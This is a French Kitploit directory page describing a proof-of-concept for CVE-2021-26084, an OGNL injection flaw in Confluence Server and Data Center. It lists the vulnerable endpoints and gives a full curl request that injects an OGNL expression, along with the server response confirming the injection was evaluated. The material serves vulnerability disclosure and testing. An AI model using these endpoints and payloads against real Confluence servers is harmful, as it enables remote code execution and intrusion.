Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-26084_PoC — Exploit de preuve de concept pour CVE-2021-26084, une vulnérabilité d'injection OGNL dans Confluence Server et Data Center, démontrant une exécution de code à distance non authentifiée. | Kitploit
Outils/GitHubGitHub/alt3kx/cve-2021-26084_poc
Génération de PayloadsAnalyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'Intrusion
GitHubalt3kx/cve-2021-26084_poc

CVE-2021-26084_PoC

Exploit de preuve de concept pour CVE-2021-26084, une vulnérabilité d'injection OGNL dans Confluence Server et Data Center, démontrant une exécution de code à distance non authentifiée.

Voir le dépôt
531648il y a 5 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-26084 (PoC) | Injection OGNL dans Webwork de Confluence Server

Une vulnérabilité d'injection OGNL existe qui permettrait à un utilisateur authentifié, et dans certains cas à un utilisateur non authentifié, d'exécuter du code arbitraire sur une instance Confluence Server ou Data Center.

poc

Mon combat pour localiser les points d'entrée et les injections XD

Combat (1)Combat (2)
2021_09_01_00_37_23_Oops_une_erreur_est_survenue_Confluence_Chromium2021_09_01_00_40_42_Oops_une_erreur_est_survenue_Confluence_Chromium

Enfin, les points d'entrée de Confluence exploités

root@kitploit:~
https://<REDACTED>/users/user-dark-features
https://<REDACTED>/login
https://<REDACTED>/pages/templates2/viewpagetemplate.action
https://<REDACTED>/template/custom/content-editor
https://<REDACTED>/templates/editor-preload-container
https://<REDACTED>/pages/createpage-entervariables.action

Ma première inspection manuelle : Remarque : Utilisateur pré-authentifié

root@kitploit:~
# curl -i -s -k -X $'POST' -H $'Host: <REDACTED>' -H $'User-Agent: alex666' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 44' -b $'JSESSIONID=<REDACTED>' --data-binary $'queryString=alt3kx\\u0027%2b#{6*666}%2b\\u0027' $'https://<REDACTED>/pages/createpage-entervariables.action'

Server Response: 

HTTP/1.1 200 
X-ASEN: <REDACTED>
Expires: Thu, 01 Jan 1970 00:00:00 GMT
<REDACTED>

[../snip]
<input type="hidden" name="queryString" value="alt3kx{3996=null}" />

Références :

https://jira.atlassian.com/browse/CONFSERVER-67940
https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

Excellent writeup publié ici :
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

Quelques indices très utiles par :
@wvuuuuuuuuuuuuu
@iamnoooob

Auteur

Alex Hernandez alias (@_alt3kx_)

Télécharger l’outil